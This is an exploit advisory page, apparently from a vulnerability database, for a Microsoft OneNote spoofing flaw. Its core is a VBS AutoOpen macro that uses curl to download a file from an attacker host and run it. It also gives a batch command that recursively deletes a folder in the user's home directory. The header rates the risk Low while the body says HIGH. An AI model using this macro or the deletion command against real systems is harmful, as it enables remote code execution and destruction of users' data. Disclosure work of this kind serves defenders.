Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit Spoofing

2023.07.05
Credit: nu11secur1ty
Risk: Low
Local: No
Remote: Yes
CWE: N/A

## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing ## Author: nu11secur1ty ## Date: 06.22.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app ## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected ## Description: Microsoft OneNote is vulnerable to spoofing attacks. The malicious user can trick the victim into clicking on a very maliciously crafted URL or download some other malicious file and execute it. When this happens the game will be over for the victim and his computer will be compromised. Exploiting the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft OneNote and then click on a specially crafted URL to be compromised by the attacker. STATUS: HIGH Vulnerability [+]Exploit: ```vbs Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus) End Sub ``` [+]Inside-exploit ``` @echo off del /s /q C:%HOMEPATH%\IMPORTANT\* ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html) ## Time spend: 01:15:00 --


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top